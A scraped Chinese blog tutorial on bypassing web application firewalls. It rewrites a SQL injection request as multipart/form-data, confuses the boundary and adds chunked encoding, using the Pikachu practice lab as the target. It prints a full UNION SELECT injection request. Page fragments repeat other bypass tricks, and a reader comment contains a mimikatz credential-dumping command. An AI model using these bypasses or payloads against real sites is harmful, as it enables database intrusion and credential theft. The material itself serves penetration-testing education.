【精选】WAF HTTP协议覆盖+分块传输组合绕过_Luckysec的博客

link管理

链接快照平台

输入网页链接，自动生成快照
标签化管理网页链接

0x01 HTTP协议覆盖介绍

HTTP协议覆盖绕过是更换Content-Type类型来绕过WAF的检测，⽬前很多WAF对Content-type类型是⾸要的检测点。利用【multipart/form-data】协议的⽅法，更改Content-type的类型为【multipart/form-data】和构造【multipart/form-data】请求内容，当WAF没有规则匹配该协议传输的数据时可被绕过。

Content-Type（MediaType），即是Internet Media Type，互联网媒体类型，也叫做MIME类型。在互联网中有成百上千种不同的数据类型，HTTP在传输数据对象时会为其打上称为MIME的数据格式标签，用于区分数据类型。在HTTP协议消息头中，使用Content-Type来表示请求和响应中的媒体类型信息。它用来告诉服务端如何处理请求的数据，以及告诉客户端（一般是浏览器）如何解析响应的数据，比如显示图片，解析并展示html等等。

Content-Type的格式如下：

Content-Type：type/subtype ;parameter - type：主类型，任意的字符串，如text，如果是*号代表所有； - subtype：子类型，任意的字符串，如html，如果是*号代表所有，用“/”与主类型隔开； - parameter：可选参数，如charset，boundary等； Content-Type: text/html; Content-Type: application/json;charset=utf-8;

Content-type常⻅的四种类型如下：

编码模式：application/x-www-form-urlencoded

HTTP会将请求参数用key1=val1&key2=val2的方式进行组织，并放到请求实体里面，注意如果是中文或特殊字符如"/"、","、“:"等会自动进行URL转码。不支持文件，一般用于表单提交。

文件上传模式：multipart/form-data

这是一个多部分多媒体类型。首先生成了一个 boundary 用于分割不同的字段，在请求实体里每个参数以–boundary开始，然后是附加信息和参数名，然后是空行，最后是参数内容。多个参数将会有多个boundary块。如果参数是文件会有特别的文件域。最后以–boundary–为结束标识。multipart/form-data支持文件上传的格式，一般需要上传文件的表单则用该类型。

文本模式：text/plain

将文件设置为纯文本的形式，浏览器在获取到这种文件时并不会对其进行处理。

JSON 模式：application/json

JSON 是一种轻量级的数据格式，以“键-值”对的方式组织的数据。这个使用这个类型，需要参数本身就是JSON格式的数据，参数会被直接放到请求实体里，不进行任何处理。服务端/客户端会按JSON格式解析数据（约定好的情况下）

0x02 HTP协议覆盖利用

以Pikachu靶场数字型注入为例，原始数据包如下：

POST /pikachu/vul/sqli/sqli_id.php HTTP/1.1
Host: 192.168.158.130
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:97.0) Gecko/20100101 Firefox/97.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 57
Connection: close
Upgrade-Insecure-Requests: 1
id=-1 union select 1,user()#&submit=%E6%9F%A5%E8%AF%A2
1. HTTP协议覆盖基础
 
在请求头修改【Content-type】值【multipart/form-data】，并设置boundary的分隔符内容。 
Content-Type: multipart/form-data;boundary=test
接着修改请求体数据格式如下： 
# 原始请求数据：
id=-1 union select 1,user()#&submit=%E6%9F%A5%E8%AF%A2
# 修改后的请求数据：
--test
Content-Disposition:form-data;name="id"
-1 union select 1,user()#
--test
Content-Disposition:form-data;name="submit"
%E6%9F%A5%E8%AF%A2
--test--
2. boundary边界混淆
 
在首个boundary分隔符号后添加英文逗号和任意干扰字符，且再增加一个boundary分隔符混淆，通过多boundary定义，使WAF检测范围和实际上传范围不一致，从而绕过WAF。 
3. BurpSuite一键编码
 
BurpSuite里自带修改HTTP协议覆盖的功能，可以通过右键菜单的body编码改变（Change body encoding）功能进行一键替换。 
更改后的效果如下： 
4. 配合分块传输绕过WAF
 
 WAF分块传输绕过详解：http://www.luckyzmj.cn/posts/d2cc72dd.html 
在此基础上可以配合分块编码传输组合绕过WAF检测，利用分块编码传输插件（Chunked coding converter）一键编码。 
编码效果如下： 
https://cloud.tencent.com/developer/article/1922588
https://www.freebuf.com/articles/web/288177.html
https://www.jianshu.com/p/de5845b4c095
                    0x01 HTTP协议覆盖介绍HTTP协议覆盖绕过是更换Content-Type类型来绕过WAF的检测，⽬前很多WAF对Content-type类型是⾸要的检测点。利用【multipart/form-data】协议的⽅法，更改Content-type的类型为【multipart/form-data】和构造【multipart/form-data】请求内容，当WAF没有规则匹配该协议传输的数据时可被绕过。Content-Type（MediaType），即是Internet Media Type，互联网媒体
					"Content type 'multipart/form-data;boundary=--------------------------258075776767858126421870;chars
				Http --  WAF1，几种Web攻击2，WAF2.1 WAF功能2.2 WAF实现原理
1，几种Web攻击
DDoS（洪水攻击）：黑客控制许多“僵尸”计算机，向目标服务器发起大量无效请求。服务器无法区分正常用户和黑客，挤占正常用户应有资源。攻击强度大像“洪水”一样对网站的服务能力造成冲击，耗尽带宽、CPU 和内存，导致网站完全无法提供正常服务
SQL注入：字符串拼接形成 SQL 语句的漏洞，构造出非正常的 SQL 语句，获取数据库内部的敏感信息。
HTTP头注入：在“Host”“User-Agent”
				文章目录前言WAF绕过隧道传输绕过分块传输绕过协议未覆盖绕过组合拳方式绕过分块传输的混淆Filename混淆绕过总结
提前声明，本文内容虽然主要针对的是 SQL WAF 的绕过演示，但由于是基于在 HTTP 协议层面绕过 Waf，因此所述技巧具有较高的通用性，所以理论上可以用于平时渗透时的方方面面，比如命令执行，代码注入，SQL注入等测试。
关于 Bypass WAF 先前已经写过两篇相关的文章可结合阅读：
WAF绕过技术基础：渗透测试-浅析WAF绕过；
WAF绕过进阶HPP：Bypass WAF-
				本篇文章主要介绍WAF的一些基本原理，总结常见的SQL注入Bypass WAF技巧。WAF是专门为保护基于Web应用程序而设计的，我们研究WAF绕过的目的一是帮助安服人员了解渗透测试中的测试技巧，而是能够对安全设备厂商提供一些安全建议，及时修复WAF存在的安全问题，以增强WAF的完备性和抗攻击性。三是希望网站开发者明白并不是部署了WAF就可以高枕无忧了，要明白漏洞产生的根本原因，最好能在代码层面上就将其修复。
一、WAF的定义
WAF(Web应用防火墙)是通过执行一系列针对HTTP/HTTPS的安全策略
				不知大家是否也有这样的疑惑呢？
如在B站上看视频的话，我当前看的是p1，然后我点p2，在网速慢的情况下，js异步请求还没传回数据的时候，我又点击p3，为什么p2请求的数据没有呈现，使页面播放p2，而是直接播放p3？
本循着探寻的精神，我也不知道它到底是如何实现的，直到我看到了这个文章。
axios,二次请求的时候，取消第一次请求
通过检查b站页面li的click绑定事件，发现调用函数，通过源码检...
一：漏洞产生的原因
由于文件上传功能实现代码没有严格限制用户上传的文件后缀以及文件类型，导致攻击者能够向某个可通过web访问的目录上传恶意文件，并被脚本解析器执行，这样就可以在服务器上执行恶意脚本。
关于文件上传漏洞绕过的练习，可以通过自己搭建源码upload-labs来学习。
二：常见的文件检测方式与绕过方式
前端js检测：
绕过方式：在前端页面修改js或者删除当前js直接上传，抓包...
1、脏数据绕过
即传入一段长数据使waf失效，从而实现绕过waf。某些waf处理POST的数据时，只会检测开头的8K，后面选择全部放过。
例如，当发现某网站存在一个反序列化漏洞时，但是无回显，被waf拦截了
利用脏数据插入5000个x字符，可以成功绕过。
2、高并发绕过
对请求进行并发，攻击请求会被负载均衡调度到不同节点，导致某些请求绕过了waf的拦截
3、http参数污染...
				WAF绕过Cookie主要是通过修改请求方式或使用复参数绕过的方法。其中，修改请求方式是最常见且典型的绕过方式。在一些ASP或ASPx网站中，WAF可能对GET请求进行了过滤，但对Cookie甚至POST参数没有进行检测。因此，攻击者可以通过修改请求方式为POST或使用复参数来绕过WAF的检测。这样，攻击者可以绕过WAF对Cookie的防护，从而对网站进行攻击。123
#### 引用[.reference_title]
-  *1* *2* *3* [waf绕过之——waf注入绕过](https://blog.csdn.net/weixin_43079958/article/details/105825299)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item]
[ .reference_list ]
                    柠檬树下少年蓝.: 
                    在执行mimikatz.exe "privilege::debug" "dpapi::cred /in:C:\Users\administrator.TEST\appdata\local\microsoft\credentials\0DA5B2F5BE6A627930340570D3B4F21C"命令后，出现了下面错误：
mimikatz(commandline) # dpapi::cred /in:C:\Users\administrator.TEST\appdata\local\microsoft\credentials\0DA5B2F5BE6A627930340570D3B4F21C
ERROR kuhl_m_dpapi_cred ; kull_m_file_readData (0x00000003)
是怎么回事
                Java RMI 远程代码执行漏洞
                    为什么我的小天工具无法连接呀，我用的是vulhub的环境，1099端口，连接失败
                基于Hexo+Matery的LuckyBlog开源搭建教程
                    不吃土豆617: 
                    ？？？copy的文章吧
                基于Hexo+Matery的LuckyBlog开源搭建教程
                    阿浩~（＾∀＾）~: 
                    博主，你好，那个独立相册，点击封面图片后，不能跳转到正确的路径，这种情况应该怎么解决，可以回答一下吗？